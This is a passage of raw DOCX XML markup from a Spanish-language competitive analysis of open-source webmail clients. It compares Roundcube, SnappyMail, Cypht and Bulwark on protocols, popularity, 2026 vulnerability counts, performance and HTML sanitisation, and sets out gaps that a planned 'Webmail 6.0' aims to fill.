        <w:gridCol w:w="870"/>
        <w:gridCol w:w="870"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="957"/>
        <w:gridCol w:w="870"/>
        <w:gridCol w:w="1392"/>
        <w:gridCol w:w="870"/>
        <w:gridCol w:w="1044"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proyecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lenguaje</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Protocolos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estrellas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contrib.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Última Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVs 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lighthouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Roundcube 1.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP/SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7.1k</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[126]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">294</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mayo 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15+</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[56]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SnappyMail 2.38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP/SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1.6k</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[127]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oct 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">99%</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[67]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cypht 2.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP/JMAP/SMTP/POP3/EWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1.6k</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[244]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">92</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jun 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bulwark 1.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TypeScript/Next.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JMAP (nativo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~660</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[92]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jun 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La tabla anterior condensa las dimensiones críticas de comparación. Roundcube domina en ecosistema y despliegues pero acumula deuda de seguridad crítica. SnappyMail maximiza el rendimiento a costa de gobernanza frágil. Cypht lidera en innovación protocolar pero arrastra una UX desfasada. Bulwark representa el futuro tecnológico pero con acoplamiento de infraestructura que limita su adopción generalizada. Ninguno de los cuatro combina simultáneamente una UI moderna, un stack TypeScript contemporáneo, soporte dual IMAP/JMAP, calendario integrado y despliegue Docker simple.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="31" w:name="análisis-de-brechas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Análisis de Brechas</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="29" w:name="X648870674527c73f824c8ba87d80d94da0dcdbb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2.1 La combinación inexistente: UI moderna + TypeScript + IMAP/JMAP dual + calendario + Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El análisis competitivo revela una brecha estructural en el mercado: ninguna solución existente combina los cinco atributos que los usuarios de webmail moderno demandan en 2026. Roundcube ofrece IMAP universal y calendario vía plugin pero carece de stack moderno y tiene problemas de seguridad sistémicos. SnappyMail entrega rendimiento excepcional pero con gobernanza incierta y sin calendario nativo. Cypht proporciona soporte JMAP pionero pero con una interfaz que no compite con los estándares actuales. Bulwark adopta TypeScript/JMAP de manera ejemplar pero sacrifica compatibilidad universal al depender de Stalwart.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1210"/>
        <w:gridCol w:w="1210"/>
        <w:gridCol w:w="1320"/>
        <w:gridCol w:w="770"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="2420"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capacidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Roundcube</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SnappyMail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cypht</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bulwark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Webmail 6.0 (objetivo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UI moderna (3-paneles)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parcial</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[96]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[62]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limitada</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[39]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[92]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí (Gmail-like)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stack TypeScript</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Sí</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[337]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP compatible universal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Requiere proxy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[92]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí (nativo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JMAP nativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[84]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí (nativo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí (abstracto)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Calendario integrado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Plugin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[245]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parcial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[337]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí (CalDAV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker simple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Complejo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No oficial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No oficial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí (Compose)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lighthouse &gt;95%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">99%</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[67]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Objetivo &gt;95%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sanitización HTML robusta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Débil</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[68]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Prioridad arquitectónica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
